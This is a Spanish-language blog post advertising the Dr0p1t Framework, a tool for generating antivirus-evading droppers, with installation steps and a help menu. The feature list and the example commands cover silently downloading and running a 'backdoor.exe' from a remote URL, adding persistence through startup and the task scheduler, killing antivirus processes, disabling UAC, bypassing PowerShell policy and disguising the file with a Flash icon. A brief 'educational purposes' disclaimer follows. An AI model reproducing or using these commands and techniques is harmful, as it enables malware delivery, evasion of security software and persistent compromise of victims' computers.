Dr0p1t- Framework: Framework para crear un Dropper FUD

0
1092
views

Un dropper es un tipo de troyano que te permite descargar otros malwares y Dr0p1t te permite crear droppers que hacen bypass de la mayoría de los AVs junto con otros trucos.

Caracteristicas

  • Framework funciona con windows y Linux
  • Descarga y ejecuta en el objetivo de en modo silencioso
  • El tamano del executable generado es mas pequeno que el otro droppers generados de la misma forma.
  • funcion de autodestruccion, cuando el dropper se eliminara despues de terminar el trabajo
  • Agregar el ejecutable despues de descargar al startup
  • Agrega el ejecutable despues de descargarlo al administrador de procesos (UAC no importa)
  • Busca y mata el antivirus antes de correr el malware
  • Corre el archivo personalizado que elejiste antes de correr el (Bach|powershell|vbs)
  • La habilidad de desabilitar UAC
  • Al correr powershell puede saltarse las politicas de ejecucion
  • Utiliza la compresion UPX despues de crear el dropper
  • Elegir un icono antes de crear el dropper

 

pre requisitos

  1. python 2 o python 3
  2. las librerías de python requeridas en el archivo requirements.txt

Dependencias necesarias en linux

  • Wine
  • python 2.7 en la maquina wine

 

Instalacion

en linux

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework

pip install -r requirements.txt

./Dr0p1t.py

En windows

cd Dr0p1t-Framework

pip install -r requirements.txt

pip install -r windows_requirements.txt

./Dr0p1t.py

Probado en

  • Kali Linux – SANA
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Menu de ayuda

sage: Dr0p1t.py Malware_Url [Options]
options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
--upx Use UPX to compress the final file.
--nouac Disable UAC on victim device
--nocompile Tell the framework to not compile the final file.
-i Use icon to the final file. Check icons folder.
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information


./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

 

Descarga Dr0p1t-Framework

 

No olviden compartir es gratis, como el conocimiento.

Toda la información proporcionada en este medio es para fines educativos, en ningún caso alguno se hace responsable e cualquier mal uso de la información. Toda la información es para el desarrollo e investigación de métodos de seguridad informática.

No olvides visitar nuestra hacking shop

shop